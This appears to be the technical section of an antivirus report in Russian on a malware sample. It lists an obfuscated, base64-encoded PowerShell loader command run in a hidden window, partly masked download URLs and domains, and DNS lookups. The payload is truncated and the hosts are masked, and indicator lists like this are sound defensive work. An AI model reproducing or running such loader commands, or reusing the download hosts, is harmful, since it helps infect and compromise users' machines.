Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFAAcwBIAE8AbQBFAFsAMgAxAF0AKwAkAFAAcwBIAG8AbQBFAFsAMwA0AF0AKwAnAFgAJwApACgAIABuAGUAVwAtAE8AYgBKAEUAYwBUACAAIABJAE8ALgBjAG8ATQBwAFIARQBzAFMASQBPAG4ALgBEAEUAZgBsAEEAVABFAHMAdAByAE...
- 'el###wessel.com':80
- 'mo####achmusic.de':80
- 'ai##axx.rs':80
- 'ta##.orion.rs':80
- http://el###wessel.com/vu6xGmS/
- http://mo####achmusic.de/XuBBN6r/
- http://ai##axx.rs/wIdY/
- http://ta##.orion.rs/suspended.page/
- DNS ASK iy####leralemi.com
- DNS ASK th####erconxion.com
- DNS ASK el###wessel.com
- DNS ASK mo####achmusic.de
- DNS ASK ai##axx.rs
- DNS ASK ta##.orion.rs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFAAcwBIAE8AbQBFAFsAMgAxAF0AKwAkAFAAcwBIAG8AbQBFAFsAMwA0AF0AKwAnAFgAJwApACgAIABuAGUAVwAtAE8AYgBKAEUAYwBUACAAIABJAE8ALgBjAG8ATQBwAFIARQBzAFMASQBPAG4ALgBEAEUAZgBsAEEAVABFAHMAdAByAE...' (со скрытым окном)